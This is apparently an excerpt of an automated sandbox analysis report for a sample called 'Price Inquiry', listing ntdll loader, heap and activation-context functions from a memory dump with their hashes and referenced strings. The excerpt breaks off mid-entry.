Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 162ad88576f9c3b16d54cf9e91436991e2934a987fd6525d7bb87be608e5192d
Instruction ID: 55e70544200e8ff8e5309736fd86a6fae837eaada404dc4c3259a8c31f29af0f
Opcode Fuzzy Hash: 162ad88576f9c3b16d54cf9e91436991e2934a987fd6525d7bb87be608e5192d
Instruction Fuzzy Hash: 70C18A7590D382CFD721CF98C844B6AB7E4BF84704F04896AF995CB252E734CA4ACB56

Function 01708402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01708591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0170855E
LdrpInitializeProcess, xrefs: 01708422
minkernel\ntdll\ldrinit.c, xrefs: 01708421

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: c3c81b8510c756fb2b2fc2b09f827187664eac0db4f1990ec59a6c5ffcd5c9e9
Instruction ID: b1612003c0968304a7c18737c18d8675e6519fc077dd41a8a893e152202c3f5e
Opcode Fuzzy Hash: c3c81b8510c756fb2b2fc2b09f827187664eac0db4f1990ec59a6c5ffcd5c9e9
Instruction Fuzzy Hash: 46918871908345EFD722DF65CC45FABFAE8BB84684F40092EFA8496195E331D9048B62

Function 0170273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 017028D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017421D9, 017422B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017422B6
SXS: %s() passed the empty activation context, xrefs: 017421DE

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: ac526f142390a8aeace2336bd9b72cfebbd86dc502a06535b04403729b24e2b8
Instruction ID: 81628815c421bc0c8fb5954bb9cebd273f6c5fde9b40bf181ca95d34983d1973
Opcode Fuzzy Hash: ac526f142390a8aeace2336bd9b72cfebbd86dc502a06535b04403729b24e2b8
Instruction Fuzzy Hash: 23A1B036944329DBDB26CF58DC88BA9F3B5BF58354F1541E9E908A7292D7309E80CF90

Function 01704AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01743456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01743437
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0174342A
RtlDeactivateActivationContext, xrefs: 01743425, 01743432, 01743451

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: f814693eef6942c0a6a8b2466f8951e7b44e0d2c17e8e5bd598507a5523aa3cf
Instruction ID: 44a69410c05003d76307331841bb58c43562b35f23242abc00fa50ccbf97caad
Opcode Fuzzy Hash: f814693eef6942c0a6a8b2466f8951e7b44e0d2c17e8e5bd598507a5523aa3cf
Instruction Fuzzy Hash: 3561F476600B22DBD7238F1DC881B7AF7E5EF80B50F14855DEA5A9B280C774E841CB95

Function 016D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01731028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017310AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01730FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0173106B

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 94beda7f763033364e1903cb5416f1ab284724cad2139097821783e77369e223
Instruction ID: 1278d5d8804eb8d4ddd7e2e39497b6bea9f5a42d63ad7d2ef827c7e67eb5e4b7
Opcode Fuzzy Hash: 94beda7f763033364e1903cb5416f1ab284724cad2139097821783e77369e223
Instruction Fuzzy Hash: 2971CFB19043469FCB21DF18CC88B9BBBA9EF94764F400468F9498B24AD735D589CBD2

Function 01704D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0174362F
LdrpFindDllActivationContext, xrefs: 01743636, 01743662
Querying the active activation context failed with status 0x%08lx, xrefs: 0174365C
minkernel\ntdll\ldrsnap.c, xrefs: 01743640, 0174366C

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: f371a5c9e00f2f20fa64498d8d7dedb17ee6cd811d73925268c10b671ff0fda3
Instruction ID: 3548fdb6d4c1957b2450e45d42d67617ada51811082fb1f934316e5e00152b15
Opcode Fuzzy Hash: f371a5c9e00f2f20fa64498d8d7dedb17ee6cd811d73925268c10b671ff0fda3
Instruction Fuzzy Hash: AA31A922A00711DFDF33AA0CDC89A75E6E4BB01664F46816AD70B572D1E7A0DDC087D5

Function 016F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 016F2462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0173A992
LdrpDynamicShimModule, xrefs: 0173A998
minkernel\ntdll\ldrinit.c, xrefs: 0173A9A2

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 77deffc0c87822731d969ed94a92d5740eadca4454415749c696faee1c2f389f
Instruction ID: f50bb3d192e9edd30798a0cb146a2aa3903941ac1d45f1bdeebb3d63f987187c
Opcode Fuzzy Hash: 77deffc0c87822731d969ed94a92d5740eadca4454415749c696faee1c2f389f
Instruction Fuzzy Hash: 27314872640201EFDB319F59DC86AAAB7F5FBC0B24F15805DF941A7346C7B09982CB80

Function 016E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 016E3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016E327D
HEAP[%wZ]: , xrefs: 016E3255

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 3e777ad68d08dfdde6e3a52128e247dcaeb2d3427f3389e70c4f1c197baf0736
Instruction ID: 1ba3183bf7b48a8b68eb5ccbed35e392fde02d55a158fc41307d7c54bbdd989f
Opcode Fuzzy Hash: 3e777ad68d08dfdde6e3a52128e247dcaeb2d3427f3389e70c4f1c197baf0736
Instruction Fuzzy Hash: 4192DE719052499FDB25CF68C8587ADBBF2FF48304F18825DE84AAB391D335A946CF50

Function 016E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 017350CA
HEAP: , xrefs: 017350BD
HEAP[%wZ]: , xrefs: 017350AE

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: ab1b1b8b83d916765a6f7ce1e69e3aa6d91491b4a5a7129de1bcead0739b2e16
Instruction ID: 90bd9e2888ad7d9fc4f07a3940995e7e9e44ff1a72ae82040d83e480a545fdcb
Opcode Fuzzy Hash: ab1b1b8b83d916765a6f7ce1e69e3aa6d91491b4a5a7129de1bcead0739b2e16
Instruction Fuzzy Hash: 81F19B70701606DFEB25CF68C898B6AF7F5FB84304F1482A8E4169B396D770E981CB90

Function 016F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 016F6C24
, xrefs: 0173CA51

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 074c0ff0e7485200b2df35220346091a614957a937f4f47abb5544be32c40a59
Instruction ID: dd4a2e8b70b4990e2705d7fbb6c4a52da0985a8999f14827660022a0055dd8b8
Opcode Fuzzy Hash: 074c0ff0e7485200b2df35220346091a614957a937f4f47abb5544be32c40a59
Instruction Fuzzy Hash: 79C26E716083419FE726CF28C881BABBBE5AFC8754F04892EEA89D7341D734D945CB52

Function 016CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0172C1E4
FilterFullPath, xrefs: 0172C2E6
UseFilter, xrefs: 016CA1C1

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 5ce4b9836cc071e1a867cf3628a3ac15880c066d760071578daec33742a938c3
Instruction ID: e42cce5be0fa8aef6c26b09177c809db98463dece9c1cf0996cebeb7bf22d6d5
Opcode Fuzzy Hash: 5ce4b9836cc071e1a867cf3628a3ac15880c066d760071578daec33742a938c3
Instruction Fuzzy Hash: 5BA19A719112399BDB329F68CC88BAEF7B8EF14710F1041E9EA09A7251E7359E85CF50

Function 016F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0173A117
minkernel\ntdll\ldrinit.c, xrefs: 0173A121
Failed to allocated memory for shimmed module list, xrefs: 0173A10F

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 1e2c86862a921ea98d4c6e7abb7c92ff5c3d7f20cf0bfbb4dc9bfe47acf19bbb
Instruction ID: 46f3ca2b36984f8d050a0712f817d06513dcfbd82939c04bac209f9ae2115baa
Opcode Fuzzy Hash: 1e2c86862a921ea98d4c6e7abb7c92ff5c3d7f20cf0bfbb4dc9bfe47acf19bbb
Instruction Fuzzy Hash: F371ED71A002059FDB25DF68CD85BAEB7F2EB84714F14806DEA42EB356E734A942CB41

Function 016E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01735342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0173534D
HEAP[%wZ]: , xrefs: 01735335

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 19d0626e85341d52cb65c0d7f57c68b48bfbf0e39d7665eae97889c0e7bc0605
Instruction ID: a5711e95921ef8f6e01a1c01879b2556a49b62ace5c40c3dddc962bbf0e93476
Opcode Fuzzy Hash: 19d0626e85341d52cb65c0d7f57c68b48bfbf0e39d7665eae97889c0e7bc0605
Instruction Fuzzy Hash: 3B6190707013059FDB29CF28C884B6ABBE5FF45704F14865DE8558B296D7B1E881CB91

Function 0170C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 017482DE
minkernel\ntdll\ldrinit.c, xrefs: 017482E8
Failed to reallocate the system dirs string !, xrefs: 017482D7

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: aa1e8ff318da763a1899948ccb0eb1ca64609b942f6938aba9fab51a969d8b40
Instruction ID: e3a6b6d0dca924427abffb03dab23edc02743841a7f5d1c561733a56f8cf07e1
Opcode Fuzzy Hash: aa1e8ff318da763a1899948ccb0eb1ca64609b942f6938aba9fab51a969d8b40
Instruction Fuzzy Hash: F441E171545301EFC722EB68DD84B5BB7E9EF44B64F008A2EBA49D3294EB70D800CB95

Function 0178C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0178C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0178C1C5
PreferredUILanguages, xrefs: 0178C212

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: c9bea896861aec2f301e44adfefeb339d5be99abe66686b00c8792a4975f73d8
Instruction ID: acb0bee099ca02e5111730079859da2140e039f211d95f38c2e80569ec062b01
Opcode Fuzzy Hash: c9bea896861aec2f301e44adfefeb339d5be99abe66686b00c8792a4975f73d8
Instruction Fuzzy Hash: 4E417671D44219EBDF12EBD8CC85FEEF7B9AB18710F14416AE609B7280D7749A44CB60

Function 01764144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01764172
LdrpResValidateFilePath Enter, xrefs: 01764160
@, xrefs: 01764225

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 9b821af5ea5a0774bada4010fbda122bc634c1371d7d887f74876391cf48285c
Instruction ID: 5aa5f9048d2b5d615f68259c81d3ecd39c77ffa2662df9ebede25a83975a3cd5
Opcode Fuzzy Hash: 9b821af5ea5a0774bada4010fbda122bc634c1371d7d887f74876391cf48285c
Instruction Fuzzy Hash: 0E41FF32A04248CFEB26DBA9CC44BADFBB9FF55340F24059ADD02AB781D6358941CB10

Function 01754755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 0175488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01754888
minkernel\ntdll\ldrredirect.c, xrefs: 01754899

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 27da09f98a6e7bec702e58ce9bf5af99ed05219292c573bffa99cdececc13c1d
Instruction ID: e5a489c3d4af76bf6ae255e62711bb49cf9d53857d56783a19fd064e25cdf77d
Opcode Fuzzy Hash: 27da09f98a6e7bec702e58ce9bf5af99ed05219292c573bffa99cdececc13c1d
Instruction Fuzzy Hash: 6B41C132A442519FCBA1CF69D840A26FBE5EF49A60F05096DED4A97311F7B1EC80CB91

Function 016E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0173543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01735449
HEAP[%wZ]: , xrefs: 01735431

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: f953c30c2ac048d28f90988ca3ca6c42c5d7097b0b9465ba9c89ff634a665001
Instruction ID: 9c6f426c41ed079ae0813fd57947e90de23cf13a73ba4ddcc61e8ce2ff50dbc4
Opcode Fuzzy Hash: f953c30c2ac048d28f90988ca3ca6c42c5d7097b0b9465ba9c89ff634a665001
Instruction Fuzzy Hash: 3C11DF313161029FDB2DCA18CC89B7AF3A9EF80A25F18826DF406CB252DB71D841CB55

Function 017520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 017520F3
LdrpInitializationFailure, xrefs: 017520FA
minkernel\ntdll\ldrinit.c, xrefs: 01752104

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 111db2adca384724bde99da7ded9809068e41f0dfe27edd97e30b745d56fb86f
Instruction ID: d011273ab8678941b3dea4d11e5550a09ff021fc0d86fba648d5c750080afca5
Opcode Fuzzy Hash: 111db2adca384724bde99da7ded9809068e41f0dfe27edd97e30b745d56fb86f
Instruction Fuzzy Hash: ACF0C875740308BFE724E64DDC9AFDAB768FB40B64F14405DFA0567286D6F0A940CB91

Function 016E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01734D8A

Strings

#%u, xrefs: 01734D82

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 69643aaa8fbdff23a7ab6f89a07d4732a0427ede17efbe9bcee9765f974aece2
Instruction ID: ceee8f3d3cc76d94c7eb2ce6282b9c985c2c4a311c9ab846777f1fd3d5af6037
Opcode Fuzzy Hash: 69643aaa8fbdff23a7ab6f89a07d4732a0427ede17efbe9bcee9765f974aece2
Instruction Fuzzy Hash: 3E716972A0110ADFDB05DFA8C998BAEB7F8BF48704F144169E905A7255EB34ED41CB60

Function 016DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 016DAA13
LdrResSearchResource Exit, xrefs: 016DAA25

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 8b5953e51a71a3aa916984a49b9eb895a40d4bd5259f0967e32ec5ab75ee44fc
Instruction ID: 0fd74633b02d13fad1a888f8809cc6c873de52448e624cd30d911c302b1a83ba
Opcode Fuzzy Hash: 8b5953e51a71a3aa916984a49b9eb895a40d4bd5259f0967e32ec5ab75ee44fc
Instruction Fuzzy Hash: 26E16E71E08219ABEB22CED9CD84BAEFBBABF44310F14452AED01E7252D7749941CB51

Function 0179A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0179A551
`, xrefs: 0179A44B

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: a8a44de2c622e61297523fbdbe84d54310471349b6cddab1f197d1cac789838f
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 54C1CE312053429BEF25CF28D845B6BFBE5AFC4318F184A2DF6968B290D774D509CB82

Function 0174E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0174E75A
UEFI, xrefs: 0174E751

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 0c6389771dc8fd6c3a30234172602baab34281964508d5ab12f6382587f37b11
Instruction ID: d0ef5e9bf286b3a3ef1215cb302d47ad3bf4f53997c1a3e12136cd6a1a07d6c5
Opcode Fuzzy Hash: 0c6389771dc8fd6c3a30234172602baab34281964508d5ab12f6382587f37b11
Instruction Fuzzy Hash: 16616D71E403099FEB15DFA8C840BAEFBB9FB44710F14406DE659EB291DB35A940CB50

Function 017743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01774525
@, xrefs: 01774437

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 39b5ec01ca010ee1317bcaf515b30e95ccaf8a25bc889553e6e79bd80e6728a9
Instruction ID: 73efc836892a09235e734c67568ed423f4d87de7b3d321813c8ef75904b9e511
Opcode Fuzzy Hash: 39b5ec01ca010ee1317bcaf515b30e95ccaf8a25bc889553e6e79bd80e6728a9
Instruction Fuzzy Hash: E75106B1E0021DAEDF11DFA9CC84AEEFBBDEB44754F200529E612B7294D7309A05CB60

Function 016D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 016D0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016D063D

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 3938a7ec503d7b094de58d3c58ed4422301a615b044f79fcf2000d1cd7800c6b
Instruction ID: 5a930855fd6733be08dcdbe39f3be18de16c9431f814477e88e91c67420209f2
Opcode Fuzzy Hash: 3938a7ec503d7b094de58d3c58ed4422301a615b044f79fcf2000d1cd7800c6b
Instruction Fuzzy Hash: 9E51BE719047828FD724EF68C9446A7BBE8AF85314F10883EFA9A87341E770D545CB92

Function 016DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 016DA309
RtlpResUltimateFallbackInfo Enter, xrefs: 016DA2FB

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 00d4de91aca2ae9d144c6b5d0dbcee0d1bbe8b2ab9bc063b42296635d31f94cf
Instruction ID: 81f0e2ab95cfc276ac3179912b644edfe5c8fd8c88f4cfa280e2105b969b89ea
Opcode Fuzzy Hash: 00d4de91aca2ae9d144c6b5d0dbcee0d1bbe8b2ab9bc063b42296635d31f94cf
Instruction Fuzzy Hash: 6341C131A08649DBDB15CF99C844B6EBBB6FF85700F2540A9E900DB392EBB5D901CB50

Function 0170A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0170A5E4
Threadpool!, xrefs: 0170A5E9

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 6db5585e470050be667b58134a88c0762583ce58cb6e502c35345c91904af8d6
Instruction ID: f2f7cb4839701d60e17e6ebdf62780a0b9dd400356bf3aef0dd90ca0d057fb23
Opcode Fuzzy Hash: 6db5585e470050be667b58134a88c0762583ce58cb6e502c35345c91904af8d6
Instruction Fuzzy Hash: BF01DCB2240740EFD322DF24CD49B26B7F8EB85B25F008979B649CB294E374E804CB46

Function 016DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 016DC8C3, 016DCA40

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: faa4116b019b4db826a8fd0fc01805eb3ff8db1ff97f861542e284bd2fbf0647
Instruction ID: 19268d34bbb4a5bd983275973b692d95c9a6994e386551239aa2b0b7661983a8
Opcode Fuzzy Hash: faa4116b019b4db826a8fd0fc01805eb3ff8db1ff97f861542e284bd2fbf0647
Instruction Fuzzy Hash: 21825975E002198FEB25DFA9CC80BEDBBB5BF49310F148169E959AB391DB309942CF50

Function 01756420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 017565C1

Memory Dump Source

